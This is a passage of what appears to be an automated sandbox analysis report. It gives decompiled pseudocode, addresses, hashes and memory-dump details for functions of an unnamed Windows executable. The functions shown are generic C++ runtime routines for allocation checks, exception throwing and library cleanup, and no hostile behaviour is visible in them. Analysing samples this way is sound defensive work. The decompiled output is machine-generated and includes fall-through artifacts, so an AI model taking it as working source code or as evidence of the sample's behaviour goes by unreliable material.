                                                                                                                              0x00401269
                                                                                                                              0x00401272
                                                                                                                              0x0040127a
                                                                                                                              0x00401284
                                                                                                                              0x00401289
                                                                                                                              0x00401291
                                                                                                                              0x00401296
                                                                                                                              0x00401297
                                                                                                                              0x00401298
                                                                                                                              0x00401299
                                                                                                                              0x0040129a
                                                                                                                              0x0040129b
                                                                                                                              0x0040129c
                                                                                                                              0x0040129d
                                                                                                                              0x0040129e
                                                                                                                              0x0040129f
                                                                                                                              0x004012a4
                                                                                                                              0x004012a6
                                                                                                                              0x004012a8
                                                                                                                              0x004012ad
                                                                                                                              0x004012b6
                                                                                                                              0x004012b6
                                                                                                                              0x0040124b
                                                                                                                              0x0040124b
                                                                                                                              0x0040124b
                                                                                                                              0x0040124d
                                                                                                                              0x00401250
                                                                                                                              0x0040125c
                                                                                                                              0x0040125c
                                                                                                                              0x00401249
                                                                                                                              0x004011eb
                                                                                                                              0x004011eb
                                                                                                                              0x004011ed
                                                                                                                              0x004011ed
                                                                                                                              0x004011f9
                                                                                                                              0x004011f9

                                                                                                                              APIs
                                                                                                                              • std::exception::exception.LIBCMT ref: 00401217
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040122E
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                              • String ID: $#C
                                                                                                                              • API String ID: 4063778783-2440646757
                                                                                                                              • Opcode ID: a1bb6c4681d272f0b5c8ccce9b39f0ad36da70e9bceab5271549ea3966c5b0b5
                                                                                                                              • Instruction ID: 808733f97832fcd3b3fc558aca836fbece0d4aed7ec9b853ccc1aae4676505c7
                                                                                                                              • Opcode Fuzzy Hash: a1bb6c4681d272f0b5c8ccce9b39f0ad36da70e9bceab5271549ea3966c5b0b5
                                                                                                                              • Instruction Fuzzy Hash: D6E0EDB14143016AC30CEFA4E642A6F72E1AB84700F408E2EF90A81180EB78DA1C810B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 69%
                                                                                                                              			E00403FD0(signed int _a4) {
				char _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				signed int _t60;
				struct HINSTANCE__* _t66;
				struct HINSTANCE__* _t67;
				void* _t69;
				struct HINSTANCE__** _t70;
				signed int _t72;
				intOrPtr* _t75;
				signed int _t77;
				void* _t79;
				void* _t82;
				intOrPtr* _t83;

				_t72 = _a4;
				if(_t72 > 0) {
					_t60 = _t59 | 0xffffffff;
					_t77 = _t60 % _t72;
					__eflags = _t60 / _t72 - 0x40;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E0041A993( &_v12,  &_a4);
						_t75 =  &_v16;
						_v16 = 0x432324;
						E0041ADC6(_t75, 0x436e98);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t69);
						_push(_t82);
						_t83 = _t75;
						_push(_t79);
						_t70 = _t83 + 0xbc;
						__eflags =  *_t70;
						if( *_t70 != 0) {
							_t67 =  *(_t83 + 4);
							__eflags = _t67;
							if(_t67 != 0) {
								_t67->i(_t70);
							}
							__eflags =  *(_t83 + 0xb8);
							if( *(_t83 + 0xb8) != 0) {
								L5();
							}
						}
						_t66 =  *(_t83 + 0xb8);
						__eflags = _t66;
						 *_t70 = 0;
						 *_t83 = 0;
						 *(_t83 + 4) = 0;
						 *((intOrPtr*)(_t83 + 8)) = 0;
						 *((intOrPtr*)(_t83 + 0xc)) = 0;
						 *((intOrPtr*)(_t83 + 0x10)) = 0;
						 *((intOrPtr*)(_t83 + 0x14)) = 0;
						 *((intOrPtr*)(_t83 + 0x18)) = 0;
						 *((intOrPtr*)(_t83 + 0x1c)) = 0;
						 *((intOrPtr*)(_t83 + 0x20)) = 0;
						 *((intOrPtr*)(_t83 + 0x24)) = 0;
						 *((intOrPtr*)(_t83 + 0x28)) = 0;
						 *((intOrPtr*)(_t83 + 0x2c)) = 0;
						 *((intOrPtr*)(_t83 + 0x30)) = 0;
						 *((intOrPtr*)(_t83 + 0x34)) = 0;
						 *((intOrPtr*)(_t83 + 0x38)) = 0;
						 *((intOrPtr*)(_t83 + 0x3c)) = 0;
						 *((intOrPtr*)(_t83 + 0x40)) = 0;
						 *((intOrPtr*)(_t83 + 0x44)) = 0;
						 *((intOrPtr*)(_t83 + 0x48)) = 0;
						 *((intOrPtr*)(_t83 + 0x4c)) = 0;
						 *((intOrPtr*)(_t83 + 0x50)) = 0;
						 *((intOrPtr*)(_t83 + 0x54)) = 0;
						 *((intOrPtr*)(_t83 + 0x58)) = 0;
						 *((intOrPtr*)(_t83 + 0x5c)) = 0;
						 *((intOrPtr*)(_t83 + 0x60)) = 0;
						 *((intOrPtr*)(_t83 + 0x64)) = 0;
						 *((intOrPtr*)(_t83 + 0x68)) = 0;
						 *((intOrPtr*)(_t83 + 0x6c)) = 0;
						 *((intOrPtr*)(_t83 + 0x70)) = 0;
						 *((intOrPtr*)(_t83 + 0x74)) = 0;
						 *((intOrPtr*)(_t83 + 0x78)) = 0;
						 *((intOrPtr*)(_t83 + 0x7c)) = 0;
						 *((intOrPtr*)(_t83 + 0x88)) = 0;
						 *((intOrPtr*)(_t83 + 0x8c)) = 0;
						 *((intOrPtr*)(_t83 + 0x90)) = 0;
						 *((intOrPtr*)(_t83 + 0x94)) = 0;
						 *((intOrPtr*)(_t83 + 0x98)) = 0;
						 *((intOrPtr*)(_t83 + 0x9c)) = 0;
						 *((intOrPtr*)(_t83 + 0xa0)) = 0;
						 *((intOrPtr*)(_t83 + 0xa4)) = 0;
						 *((intOrPtr*)(_t83 + 0xa8)) = 0;
						 *((intOrPtr*)(_t83 + 0xac)) = 0;
						 *((intOrPtr*)(_t83 + 0xb0)) = 0;
						 *((intOrPtr*)(_t83 + 0xb4)) = 0;
						if(_t66 != 0) {
							_t66 = FreeLibrary(_t66);
						}
						 *(_t83 + 0xb8) = 0;
						return _t66;
					}
				} else {
					_t72 = 0;
					L2:
					_push(_t72 << 6);
					return E0041AD5C(_t69, _t77, _t79, _t82, _t72 << 6);
				}
			}




















                                                                                                                              0x00403fd0
                                                                                                                              0x00403fd9
                                                                                                                              0x00403fed
                                                                                                                              0x00403ff2
                                                                                                                              0x00403ff4
                                                                                                                              0x00403ff7
                                                                                                                              0x00000000
                                                                                                                              0x00403ff9
                                                                                                                              0x00404002
                                                                                                                              0x0040400a
                                                                                                                              0x00404014
                                                                                                                              0x00404019
                                                                                                                              0x00404021
                                                                                                                              0x00404026
                                                                                                                              0x00404027
                                                                                                                              0x00404028
                                                                                                                              0x00404029
                                                                                                                              0x0040402a
                                                                                                                              0x0040402b
                                                                                                                              0x0040402c
                                                                                                                              0x0040402d
                                                                                                                              0x0040402e
                                                                                                                              0x0040402f
                                                                                                                              0x00404030
                                                                                                                              0x00404031
                                                                                                                              0x00404032
                                                                                                                              0x00404034
                                                                                                                              0x00404035
                                                                                                                              0x0040403d
                                                                                                                              0x0040403f
                                                                                                                              0x00404041
                                                                                                                              0x00404044
                                                                                                                              0x00404046
                                                                                                                              0x00404049
                                                                                                                              0x0040404b
                                                                                                                              0x0040404e
                                                                                                                              0x00404054
                                                                                                                              0x00404058
                                                                                                                              0x00404058
                                                                                                                              0x00404054
                                                                                                                              0x0040405d
                                                                                                                              0x00404063
                                                                                                                              0x00404065
                                                                                                                              0x00404067
                                                                                                                              0x00404069
                                                                                                                              0x0040406c
                                                                                                                              0x0040406f
                                                                                                                              0x00404072
                                                                                                                              0x00404075
                                                                                                                              0x00404078
                                                                                                                              0x0040407b
                                                                                                                              0x0040407e
                                                                                                                              0x00404081
                                                                                                                              0x00404084
                                                                                                                              0x00404087
                                                                                                                              0x0040408a
                                                                                                                              0x0040408d
                                                                                                                              0x00404090
                                                                                                                              0x00404093
                                                                                                                              0x00404096
                                                                                                                              0x00404099
                                                                                                                              0x0040409c
                                                                                                                              0x0040409f
                                                                                                                              0x004040a2
                                                                                                                              0x004040a5
                                                                                                                              0x004040a8
                                                                                                                              0x004040ab
                                                                                                                              0x004040ae
                                                                                                                              0x004040b1
                                                                                                                              0x004040b4
                                                                                                                              0x004040b7
                                                                                                                              0x004040ba
                                                                                                                              0x004040bd
                                                                                                                              0x004040c0
                                                                                                                              0x004040c3
                                                                                                                              0x004040c6
                                                                                                                              0x004040cc
                                                                                                                              0x004040d2
                                                                                                                              0x004040d8
                                                                                                                              0x004040de
                                                                                                                              0x004040e4
                                                                                                                              0x004040ea
                                                                                                                              0x004040f0
                                                                                                                              0x004040f6
                                                                                                                              0x004040fc
                                                                                                                              0x00404102
                                                                                                                              0x00404108
                                                                                                                              0x0040410e
                                                                                                                              0x00404111
                                                                                                                              0x00404111
                                                                                                                              0x00404117
                                                                                                                              0x00404120
                                                                                                                              0x00404120
                                                                                                                              0x00403fdb
                                                                                                                              0x00403fdb
                                                                                                                              0x00403fdd
                                                                                                                              0x00403fe0
                                                                                                                              0x00403fec
                                                                                                                              0x00403fec

                                                                                                                              APIs
                                                                                                                              • std::exception::exception.LIBCMT ref: 0040400A
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00404021
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                              • String ID: $#C
                                                                                                                              • API String ID: 4063778783-2440646757
                                                                                                                              • Opcode ID: 91d430985750b91e3c4d25c6ac2c15a7b7c424d3126b6b3bf840cc1412c98c75
                                                                                                                              • Instruction ID: 0c734039bba19036cae35aeaa477f55f2c572191cdaa20a2b81d428b654cfd35
                                                                                                                              • Opcode Fuzzy Hash: 91d430985750b91e3c4d25c6ac2c15a7b7c424d3126b6b3bf840cc1412c98c75
                                                                                                                              • Instruction Fuzzy Hash: F8E0EDB19143026AD30CEF20E546A6F76A66B80700F408E2EF91B901C0EB78DA2C821B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00408EC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 61%
                                                                                                                              			E00408EC0(signed int _a4) {
				intOrPtr _v0;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				char _v24;
				intOrPtr* _v28;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				signed int _t29;
				void* _t37;
				signed int _t38;
				intOrPtr* _t40;
				signed int _t44;
				void* _t48;
				intOrPtr* _t49;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t55;

				_t38 = _a4;
				_t55 = _t54 - 0xc;
				if(_t38 > 0) {
					_t22 = _t21 | 0xffffffff;
					_t44 = _t22 % _t38;
					__eflags = _t22 / _t38 - 0xc;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E0041A993( &_v12,  &_a4);
						_t40 =  &_v16;
						_v16 = 0x432324;
						E0041ADC6(_t40, 0x436e98);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xffffffff);
						_push(E0043091B);
						_push( *[fs:0x0]);
						_push(_t40);
						_push(_t51);
						_push(_t48);
						_t29 =  *0x43a6a8; // 0x2a5cd135
						 *[fs:0x0] =  &_v24;
						_t49 = _t40;
						_t52 = E0041AD5C(_t37, _t44, _t49, _t51, __eflags, 0xc, _t29 ^ _t55);
						_v28 = _t52;
						__eflags = _t52;
						_v16 = 0;
						if(_t52 == 0) {
							_t52 = 0;
							__eflags = 0;
						} else {
							 *(_t52 + 4) = 0;
							 *((intOrPtr*)(_t52 + 8)) = 1;
							 *_t52 = E00419C40(_t44, _v0);
						}
						__eflags = _t52;
						_v8 = 0xffffffff;
						 *_t49 = _t52;
						if(_t52 == 0) {
							E00419B20(0x8007000e);
						}
						 *[fs:0x0] = _v16;
						return _t49;
					}
				} else {
					_t38 = 0;
					L2:
					_t45 = _t38 + _t38 * 2;
					_t47 = _t38 + _t38 * 2 + _t45 + _t38 + _t38 * 2 + _t45;
					_push(_t38 + _t38 * 2 + _t45 + _t38 + _t38 * 2 + _t45);
					return E0041AD5C(_t37, _t38 + _t38 * 2 + _t45 + _t38 + _t38 * 2 + _t45, _t48, _t51, _t47);
				}
			}
























                                                                                                                              0x00408ec0
                                                                                                                              0x00408ec4
                                                                                                                              0x00408ec9
                                                                                                                              0x00408ee1
                                                                                                                              0x00408ee6
                                                                                                                              0x00408ee8
                                                                                                                              0x00408eeb
                                                                                                                              0x00000000
                                                                                                                              0x00408eed
                                                                                                                              0x00408ef6
                                                                                                                              0x00408efe
                                                                                                                              0x00408f08
                                                                                                                              0x00408f0d
                                                                                                                              0x00408f15
                                                                                                                              0x00408f1a
                                                                                                                              0x00408f1b
                                                                                                                              0x00408f1c
                                                                                                                              0x00408f1d
                                                                                                                              0x00408f1e
                                                                                                                              0x00408f1f
                                                                                                                              0x00408f20
                                                                                                                              0x00408f22
                                                                                                                              0x00408f2d
                                                                                                                              0x00408f2e
                                                                                                                              0x00408f2f
                                                                                                                              0x00408f30
                                                                                                                              0x00408f31
                                                                                                                              0x00408f3d
                                                                                                                              0x00408f43
                                                                                                                              0x00408f4c
                                                                                                                              0x00408f51
                                                                                                                              0x00408f55
                                                                                                                              0x00408f57
                                                                                                                              0x00408f5f
                                                                                                                              0x00408f7d
                                                                                                                              0x00408f7d
                                                                                                                              0x00408f61
                                                                                                                              0x00408f66
                                                                                                                              0x00408f6d
                                                                                                                              0x00408f79
                                                                                                                              0x00408f79
                                                                                                                              0x00408f7f
                                                                                                                              0x00408f81
                                                                                                                              0x00408f89
                                                                                                                              0x00408f8b
                                                                                                                              0x00408f92
                                                                                                                              0x00408f92
                                                                                                                              0x00408f9d
                                                                                                                              0x00408faa
                                                                                                                              0x00408faa
                                                                                                                              0x00408ecb
                                                                                                                              0x00408ecb
                                                                                                                              0x00408ecd
                                                                                                                              0x00408ecd
                                                                                                                              0x00408ed2
                                                                                                                              0x00408ed4
                                                                                                                              0x00408ee0
                                                                                                                              0x00408ee0

                                                                                                                              APIs
                                                                                                                              • std::exception::exception.LIBCMT ref: 00408EFE
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00408F15
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                              • String ID: $#C
                                                                                                                              • API String ID: 4063778783-2440646757
                                                                                                                              • Opcode ID: 4b8a815c351f4bf8aa92656cb9643fa968f93af43fa557d1c68b3ac8980e1408
                                                                                                                              • Instruction ID: eb0dc41675460186d5236c11050d4daf1babbb29357c1b39a5baf3094f1ee479
                                                                                                                              • Opcode Fuzzy Hash: 4b8a815c351f4bf8aa92656cb9643fa968f93af43fa557d1c68b3ac8980e1408
                                                                                                                              • Instruction Fuzzy Hash: 11F020B19053006AC30CDF20DA41BAF73A2ABD4B01F04CE3EB44A80580EF7CD66C824B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 37%
                                                                                                                              			E00401180(signed int _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				void* __esi;
				signed int _t34;
				signed int _t35;
				signed int _t40;
				signed int _t41;
				signed int _t46;
				void* _t56;
				signed int _t57;
				signed int _t60;
				signed int _t63;
				intOrPtr* _t65;
				signed int _t67;
				void* _t73;
				void* _t74;
				intOrPtr* _t75;

				_t57 = _a4;
				if(_t57 > 0) {
					_t35 = _t34 | 0xffffffff;
					_t67 = _t35 % _t57;
					__eflags = _t35 / _t57 - 4;
					if(__eflags >= 0) {
						goto L2;
					} else {
						_a4 = 0;
						E0041A993( &_v12,  &_a4);
						_v16 = 0x432324;
						_t40 = E0041ADC6( &_v16, 0x436e98);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t60 = _v8;
						__eflags = _t60;
						if(_t60 > 0) {
							_t41 = _t40 | 0xffffffff;
							_t67 = _t41 % _t60;
							__eflags = _t41 / _t60 - 1;
							if(__eflags >= 0) {
								goto L7;
							} else {
								_v8 = 0;
								E0041A993( &_v24,  &_v8);
								_v28 = 0x432324;
								_t46 = E0041ADC6( &_v28, 0x436e98);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t63 = _v20;
								__eflags = _t63;
								if(_t63 > 0) {
									__eflags = (_t46 | 0xffffffff) / _t63 - 2;
									if(__eflags >= 0) {
										goto L12;
									} else {
										_v20 = 0;
										E0041A993( &_v36,  &_v20);
										_t65 =  &_v40;
										_v40 = 0x432324;
										E0041ADC6(_t65, 0x436e98);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t74);
										_t75 = _t65;
										E0041A9F9(_t65, _v44);
										 *_t75 = 0x432324;
										return _t75;
									}
								} else {
									_t63 = 0;
									__eflags = 0;
									L12:
									_push(_t63 + _t63);
									return E0041AD5C(_t56, _t63 + _t63, _t73, _t74, __eflags);
								}
							}
						} else {
							_t60 = 0;
							__eflags = 0;
							L7:
							_push(_t60);
							return E0041AD5C(_t56, _t67, _t73, _t74, __eflags);
						}
					}
				} else {
					_t57 = 0;
					L2:
					_push(_t57 * 4);
					return E0041AD5C(_t56, _t57 * 4, _t73, _t74, 0);
				}
			}



























                                                                                                                              0x00401180
                                                                                                                              0x00401189
                                                                                                                              0x004011a1
                                                                                                                              0x004011a6
                                                                                                                              0x004011a8
                                                                                                                              0x004011ab
                                                                                                                              0x00000000
                                                                                                                              0x004011ad
                                                                                                                              0x004011b6
                                                                                                                              0x004011be
                                                                                                                              0x004011cd
                                                                                                                              0x004011d5
                                                                                                                              0x004011da
                                                                                                                              0x004011db
                                                                                                                              0x004011dc
                                                                                                                              0x004011dd
                                                                                                                              0x004011de
                                                                                                                              0x004011df
                                                                                                                              0x004011e0
                                                                                                                              0x004011e7
                                                                                                                              0x004011e9
                                                                                                                              0x004011fa
                                                                                                                              0x004011ff
                                                                                                                              0x00401201
                                                                                                                              0x00401204
                                                                                                                              0x00000000
                                                                                                                              0x00401206
                                                                                                                              0x0040120f
                                                                                                                              0x00401217
                                                                                                                              0x00401226
                                                                                                                              0x0040122e
                                                                                                                              0x00401233
                                                                                                                              0x00401234
                                                                                                                              0x00401235
                                                                                                                              0x00401236
                                                                                                                              0x00401237
                                                                                                                              0x00401238
                                                                                                                              0x00401239
                                                                                                                              0x0040123a
                                                                                                                              0x0040123b
                                                                                                                              0x0040123c
                                                                                                                              0x0040123d
                                                                                                                              0x0040123e
                                                                                                                              0x0040123f
                                                                                                                              0x00401240
                                                                                                                              0x00401247
                                                                                                                              0x00401249
                                                                                                                              0x00401264
                                                                                                                              0x00401267
                                                                                                                              0x00000000
                                                                                                                              0x00401269
                                                                                                                              0x00401272
                                                                                                                              0x0040127a
                                                                                                                              0x00401284
                                                                                                                              0x00401289
                                                                                                                              0x00401291
                                                                                                                              0x00401296
                                                                                                                              0x00401297
                                                                                                                              0x00401298
                                                                                                                              0x00401299
                                                                                                                              0x0040129a
                                                                                                                              0x0040129b
                                                                                                                              0x0040129c
                                                                                                                              0x0040129d
                                                                                                                              0x0040129e
                                                                                                                              0x0040129f
                                                                                                                              0x004012a4
                                                                                                                              0x004012a6
                                                                                                                              0x004012a8
                                                                                                                              0x004012ad
                                                                                                                              0x004012b6
                                                                                                                              0x004012b6
                                                                                                                              0x0040124b
                                                                                                                              0x0040124b
                                                                                                                              0x0040124b
                                                                                                                              0x0040124d
                                                                                                                              0x00401250
                                                                                                                              0x0040125c
                                                                                                                              0x0040125c
                                                                                                                              0x00401249
                                                                                                                              0x004011eb
                                                                                                                              0x004011eb
                                                                                                                              0x004011eb
                                                                                                                              0x004011ed
                                                                                                                              0x004011ed
                                                                                                                              0x004011f9
                                                                                                                              0x004011f9
                                                                                                                              0x004011e9
                                                                                                                              0x0040118b
                                                                                                                              0x0040118b
                                                                                                                              0x0040118d
                                                                                                                              0x00401194
                                                                                                                              0x004011a0
                                                                                                                              0x004011a0

                                                                                                                              APIs
                                                                                                                              • std::exception::exception.LIBCMT ref: 004011BE
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004011D5
                                                                                                                                • Part of subcall function 0041AD5C: _malloc.LIBCMT ref: 0041AD74
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                              • String ID: $#C
                                                                                                                              • API String ID: 4063778783-2440646757
                                                                                                                              • Opcode ID: de11827e0b4a5d4842426f5d0f7cae8bafb98a9196c51ae6198117a12cb41826
                                                                                                                              • Instruction ID: f629ca0b12598c48b6256d0f5115ace84f4cb8bd6ae1a2421797e18d7677bcab
                                                                                                                              • Opcode Fuzzy Hash: de11827e0b4a5d4842426f5d0f7cae8bafb98a9196c51ae6198117a12cb41826
                                                                                                                              • Instruction Fuzzy Hash: A3F0A0B15143016AD30CEF60E541BAF72A1AB84704F408E2FF91A41190EB78D61CC64B
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00419F87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 79%
                                                                                                                              			E00419F87(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				char _v16;
				char _v20;
				long _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				long _v40;
				signed int _v44;
				void* _v48;
				void _v72;
				char _v80;
				void* _t34;
				signed int _t35;
				signed int _t40;
				DWORD* _t41;
				signed int _t50;
				void* _t54;
				void* _t55;
				void* _t65;
				void* _t69;
				void* _t75;

				_t75 = __eflags;
				_t60 = __esi;
				_t55 = __edi;
				_t54 = __edx;
				_t44 = __ebx;
				_push(0x44);
				E0041CB4B(E004314B3, __ebx, __edi, __esi);
				_t1 =  &_v40; // 0x2a5cd10d
				E00401F30(_t1, "invalid string position");
				_v4 = _v4 & 0x00000000;
				_t4 =  &_v40; // 0x2a5cd10d
				E00401EC0(_t54, _t75, _t4);
				_push(0x4373a8);
				_t6 =  &_v80; // 0x2a5cd0e5
				_v80 = 0x432404;
				L9();
				asm("int3");
				_t65 = _t69;
				while(1) {
					_t34 = E0041C9FB(_t44, _t54, _t55, _t60, _a4);
					if(_t34 != 0) {
						break;
					}
					_t35 = E00420513(_a4);
					__eflags = _t35;
					if(_t35 == 0) {
						__eflags =  *0x43c124 & 0x00000001;
						if(( *0x43c124 & 0x00000001) == 0) {
							 *0x43c124 =  *0x43c124 | 0x00000001;
							__eflags =  *0x43c124;
							E0041AD43(0x43c118);
							E0041B6E1( *0x43c124, 0x431644);
						}
						E0041A9F9( &_v16, 0x43c118);
						_push(0x436e98);
						_push( &_v16);
						_v16 = 0x432324;
						L9();
						asm("int3");
						_push(_t65);
						_push(0x43c118);
						_push(_t55);
						_t50 = 8;
						_v48 = memcpy( &_v72, 0x433e38, _t50 << 2);
						_t40 = _v28;
						__eflags = _t40;
						_v44 = _t40;
						if(_t40 != 0) {
							__eflags =  *_t40 & 0x00000008;
							if(( *_t40 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t41 =  &_v20;
						RaiseException(_v40, _v36, _v24, _t41);
						return _t41;
					} else {
						continue;
					}
					L13:
				}
				return _t34;
				goto L13;
			}

























                                                                                                                              0x00419f87
                                                                                                                              0x00419f87
                                                                                                                              0x00419f87
                                                                                                                              0x00419f87
                                                                                                                              0x00419f87
                                                                                                                              0x00419f87
                                                                                                                              0x00419f8e
                                                                                                                              0x00419f98
                                                                                                                              0x00419f9b
                                                                                                                              0x00419fa0
                                                                                                                              0x00419fa4
                                                                                                                              0x00419fab
                                                                                                                              0x00419fb0
                                                                                                                              0x00419fb5
                                                                                                                              0x00419fb9
                                                                                                                              0x00419fc0
                                                                                                                              0x00419fc5
                                                                                                                              0x0041ad5d
                                                                                                                              0x0041ad71
                                                                                                                              0x0041ad74
                                                                                                                              0x0041ad7c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ad67
                                                                                                                              0x0041ad6c
                                                                                                                              0x0041ad6f
                                                                                                                              0x0041ad80
                                                                                                                              0x0041ad8c
                                                                                                                              0x0041ad8e
                                                                                                                              0x0041ad8e
                                                                                                                              0x0041ad97
                                                                                                                              0x0041ada1
                                                                                                                              0x0041ada6
                                                                                                                              0x0041adab
                                                                                                                              0x0041adb0
                                                                                                                              0x0041adb8
                                                                                                                              0x0041adb9
                                                                                                                              0x0041adc0
                                                                                                                              0x0041adc5
                                                                                                                              0x0041adc6
                                                                                                                              0x0041adcf
                                                                                                                              0x0041add0
                                                                                                                              0x0041add3
                                                                                                                              0x0041adde
                                                                                                                              0x0041ade1
                                                                                                                              0x0041ade4
                                                                                                                              0x0041ade7
                                                                                                                              0x0041adeb
                                                                                                                              0x0041aded
                                                                                                                              0x0041adf0
                                                                                                                              0x0041adf2
                                                                                                                              0x0041adf2
                                                                                                                              0x0041adf0
                                                                                                                              0x0041adf9
                                                                                                                              0x0041ae06
                                                                                                                              0x0041ae0d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041ad6f
                                                                                                                              0x0041ad7f
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • __EH_prolog3.LIBCMT ref: 00419F8E
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00419FC0
                                                                                                                                • Part of subcall function 0041ADC6: RaiseException.KERNEL32(?,?,0041ADC5,?,?,?,?,?,0041ADC5,?,00436E98,0043C118), ref: 0041AE06
